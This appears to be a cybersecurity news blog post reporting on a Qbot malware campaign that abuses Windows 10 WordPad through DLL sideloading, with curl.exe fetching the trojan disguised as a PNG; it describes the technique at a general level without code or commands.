Qbot operators using .DLL malware to exploit windows systems
In the ever-evolving scenario of cyber threats, hostile actors continue to use sophisticated methods to enter computer systems and exploit sensitive data. One such example is the utilization of Qbot operators, who use a crafty approach by leveraging a malicious .DLL malware to hijack Windows WordPad.
This strategy allows them to evade detection and carry out their malicious activities undetected. In this blog post, we will delve into the workings of Qbot operators and explore how they exploit WordPad as a covert tool.
Threat actors exploit vulnerability in Windows 10 WordPad
According to researchers, hackers have started exploiting a vulnerability in the Windows 10 preloaded WordPad text editor to distribute the Qbot malware. ProxyLife, a member of Cryptolaemus and a cybersecurity researcher, recently uncovered an email campaign where hackers are distributing the WordPad program along with a malicious .DLL file.
After launching WordPad, the application searches for specific .DLL files required for proper functioning. Initially, it looks for these files in its folder. If the necessary .DLL files are found, WordPad automatically executes them, even if they are malicious.
What is DLL Hijacking
The technique involved in this practice is commonly known as "DLL sideloading" or "DLL hijacking" and has been utilized by hackers before. Previously, attackers were observed using the Calculator app for a similar purpose.
In this case, when WordPad executes the DLL, the malicious file leverages an executable called Curl.exe, located in the System32 folder, to download a DLL disguised as a PNG file. However, this DLL is Qbot, an old banking trojan capable of stealing emails for use in phishing attacks and initiating the download of additional malware like Cobalt Strike.
Using Wordpad to evade detection
By using legitimate programs like WordPad or Calculator to execute malicious DLL files, threat actors aim to evade antivirus programs and maintain a stealthy presence during the attack.
It's worth noting that this method relies explicitly on Curl.exe, limiting its effectiveness to Windows 10 and newer versions, as earlier iterations of the operating system did not have this program preinstalled.
Even so, considering that older versions are nearing their end of support and users are transitioning to Windows 10 and 11, this limitation provides little respite
According to recent reports from BleepingComputer, the QBot operation has transitioned to employing alternative infection methods in recent weeks. This indicates that the threat actors behind QBot are continually adapting their tactics to evade detection and improve their success rates.
As cybercriminals evolve their strategies, it becomes increasingly crucial for individuals and organizations to stay vigilant and employ robust cybersecurity measures to protect against emerging threats.